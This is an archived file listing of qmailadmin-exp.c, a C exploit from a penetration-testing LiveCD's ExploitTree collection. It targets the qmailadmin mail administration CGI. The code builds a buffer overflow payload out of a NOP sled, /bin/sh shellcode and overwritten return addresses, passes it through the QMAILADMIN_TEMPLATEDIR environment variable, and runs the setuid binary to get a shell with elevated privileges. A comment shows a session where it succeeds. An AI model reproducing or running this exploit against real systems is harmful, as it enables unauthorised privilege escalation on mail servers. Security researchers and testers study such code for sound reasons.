home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / qmail / qmailadmin-exp.c < prev    next >
Text File  |  2005-02-12  |  1KB  |  40 lines
  1. /* http://www.badc0ded.com (bug found by Thomas Cannon)
  2.  / bash-2.05a$ ./qmailadmin-exp
  3.  / Content-Type: text/html
  4.  / $ id
  5.  / uid=1000(dim) euid=89(vpopmail) gid=1000(dim) egid=89(vchkpw) groups=89(vchkpw), 1000(dim), 0(wheel)
  6.  / $ 
  7. */
  8.  
  9.  
  10. char shellcode[]=          /* 23 bytes                       */
  11.     "\x31\xc0"             /* xorl    %eax,%eax              */
  12.     "\x50"                 /* pushl   %eax                   */
  13.     "\x68""//sh"           /* pushl   $0x68732f2f            */
  14.     "\x68""/bin"           /* pushl   $0x6e69622f            */
  15.     "\x89\xe3"             /* movl    %esp,%ebx              */
  16.     "\x50"                 /* pushl   %eax                   */
  17.     "\x54"                 /* pushl   %esp                   */
  18.     "\x53"                 /* pushl   %ebx                   */
  19.     "\x50"                 /* pushl   %eax                   */
  20.     "\xb0\x3b"             /* movb    $0x3b,%al              */
  21.     "\xcd\x80"             /* int     $0x80                  */
  22. ;
  23.  
  24. main ()
  25. {
  26.    char buf[16000];
  27.    int i;
  28.    memset(buf,0,sizeof(buf));
  29.    memset(buf,0x90,5977); 
  30.    strcat(buf,shellcode);
  31.  
  32.    for (i=0;i<=2203;i++)
  33.      strcat(buf,"\xd8\xef\x06\x08");   // lang_fs magic..
  34.    strcat (buf,"\xf1\xcb\xbf\xbf");    // ret..
  35.    setenv("QMAILADMIN_TEMPLATEDIR",buf);
  36.    execlp("/usr/local/www/cgi-bin.default/qmailadmin/qmailadmin","qmailadmin",0);
  37.    
  38.    
  39. }
  40.